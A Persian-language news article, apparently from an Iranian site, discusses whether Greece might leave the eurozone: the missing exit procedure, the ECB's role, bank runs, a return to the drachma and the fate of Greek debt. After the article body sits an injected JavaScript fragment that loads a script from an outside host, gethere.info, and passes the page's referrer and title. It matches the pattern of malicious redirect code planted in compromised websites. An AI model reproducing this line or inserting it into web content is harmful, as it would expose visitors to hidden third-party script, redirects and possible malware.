سه شنبه , 21 آذر 1396
خانه / اخبار اقتصادی / اقتصاد جهان / آیا یونان از حوزه پولی یورو خارج می‌شود؟ نگاهی به گزینه‌های احتمالی

آیا یونان از حوزه پولی یورو خارج می‌شود؟ نگاهی به گزینه‌های احتمالی

باقی ماندن و یا خروج یونان از معاهده واحد پول مشترک اروپایی «یورو» به نقطه تعیین کننده‌ای رسیده است. یونان در پایان ماه جاری میلادی (کمتر از دو هفته دیگر) باید ۱.۶ میلیارد یورو از بدهی‌های خود را پرداخت کند. در غیر این‌صورت با نقض تعهدات خود در قبال وام دهندگان ممکن است مجبور شود از حوزه پولی یورو خارج شود.

برای پرداخت این بدهی، یونان به کمک‌های مالی جدید اتحادیه اروپا نیاز دارد. دو طرف تا رسیدن به توافق فاصله زیادی دارند و محور اصلی اختلافات، اصلاحاتی است که یونان در مقابل دریافت کمک‌های مالی باید اجرا کند.

یک نکته کاملا روشن است و آن بحث در مورد احتمال خروج یونان از معاهده پول مشترک اروپایی و آماده شدن اروپا برای چنین حالتی است.

به گزارش خبرگزاری آسوشیتدپرس، یکی از معاونان کمیسیون اروپا روز ۲۷ خرداد گفت: «کشورهای عضو اتحادیه قاعدتا مضطرب هستند. تا پایان ماه ژوئن و مهلت تعیین شده برای بازپرداخت بدهی یونان و رسیدن به یک توافق فقط دو هفته باقی مانده است و از هم اکنون گفت‌وگو در مورد وقوع حالت نامطلوب آغاز شده است».

بررسی احتمالات:

چگونه یک کشور از واحد پول مشترک اروپا خارج می‌شود؟

از منظر مقررات و اداری چنین چیزی ناممکن است و این حالت در معاهده مربوط به حوزه مالی یورو پیش‌بینی نشده است. اعضای اتحادیه اروپا می‌توانند این اتحادیه را ترک کنند ولی هیچ روشی برای خروج از حوزه یورو تنظیم نشده است. در عالم فرض، اگر همه ۱۹ کشور عضو حوزه پولی یورو با خروج یونان از این معاهده توافق داشته باشند، مذاکره در مورد این حالت می‌تواند آغاز شود. برخی معتقدند که یونان برای خروج از یورو باید به طور کلی از اتحادیه اروپا خارج شود.

این نقطه بدون بازگشت چگونه تعیین می‌شود؟

به گفته کارشناسان، زمانی که بانک مرکزی اروپا دادن وام‌های اضطراری به بانک‌های یونانی را قطع کند، عملا رابطه یونان با حوزه پولی یورو قطع خواهد شد. اگر بانک‌های یونان ورشکسته شوند ممکن است بانک مرکزی اروپا حمایت مالی از آنها را متوقف کند. اگر یونان و اروپا تا پایان ماه جاری میلادی به توافق نرسند، ممکن است بانک‌های کشور ورشکسته شده و نتوانند اقساط بعدی بدهی‌ها را تا ۳۰ ماه ژوئن بپردازند. بانک مرکزی اروپا در صورت پرداخت نشدن اقساط بعدی بدهی‌های یونان، در پایان ماه ژوئیه و یا اوت، نیز می‌تواند حمایت مالی خود را از بانک‌های یونان قطع کند.

در آن حالت چه اتفاقی خواهد افتاد؟

احتمالا بانک‌ها مجبور خواهند شد برای مدتی کار خود را تعطیل کنند و دولت برای بیرون کشیدن سپرده‌های مشتریان از بانک‌ها سقف مشخصی تعیین خواهد کرد. کارشناسان می‌گویند در صورت تشدید بی‌ثباتی، مردم سعی خواهند کرد همه پول‌های خود را از بانک‌ها بیرون بکشند اما بانک‌ها قادر نخواهند بود این پول‌ها را بپردازند. مردم سعی خواهند کرد پول خود را در خانه نگه دارند، مالیات ندهند و کل سیستم مالی کشور متوقف خواهد شد.

یونان به چه شکل می‌تواند از وقوع این فاجعه احتمالی پرهیز کند؟

گذشته از پرداخت به موقع اقساط بدهی‌های خود، برخی از کارشناسان معتقدند که یونان با طراحی پنهانی خروج خود از حوزه یورو می‌تواند از دامنه صدمات اقتصادی بر این کشور بکاهد. گروه کوچکی از مقامات و مسئولان یونان می‌توانند برنامه خروج کشور را طراحی کرده و در زمان لازم به سرعت آن را اجرا کنند. چند ساعت قبل از اجرای تصمیم خود این موضوع را به اتحادیه اروپا خبر خواهند داد و افکار عمومی یونان آخرین کسانی خواهند بود که از این موضوع با خبر خواهند شد.

یونان از چه واحد پولی استفاده خواهد کرد؟

یونان می‌تواند «دراخما» واحد پول قبلی خود و یا یک واحد پول جدید را انتخاب کند. در هر صورت حجم نقدینگی و تعیین ارزش برابری این واحد پول مهم‌ترین عامل است. عراق پس از سقوط رژیم صدام حسین برای به گردش انداختن دینار جدید خود با همین مشکل مواجه بود. کارشناسان تاکید می‌کنند که در همان مقطع اولیه به گردش درآمدن یک ارز جدید، باید حجم زیادی از آن پول در دسترس حکومت قرار گیرد. حمل‌ونقل این حجم زیاد از پول جدید نیازمند تدارک و اقدامات امنیتی و لجستیکی گسترده‌ای است. اجرای این برنامه یک چالش بزرگ خواهد بود.

آینده بدهی‌های خارجی یونان چه خواهد شد؟

بدهی‌های یونان لغو و یا ناپدید نخواهند شد و از آن پس بحث بر سر نحوه تبدیل رقم بدهی‌ها به واحد پولی جدید یونان متمرکز خواهد شد. مسلما دولت یونان به تلاش برای تغییر شروط و یا اقساط بدهی‌ها ادامه خواهد داد. یکی از جنبه‌های مثبت این گزینه برای یونان این است که وام دهندگان به آن کشور مجبور خواهند شد از بخشی از بدهی‌های یونان صرف نظر کنند. اما کارشناسان معتقدند که هزینه اقتصادی چنین گزینه‌ای، از جمله افت شدید در تولید ناخالص ملی و افزایش رقم بیکاری، برای یونان بیشتر از فواید آن خواهد بود.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

پاسخ دهید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *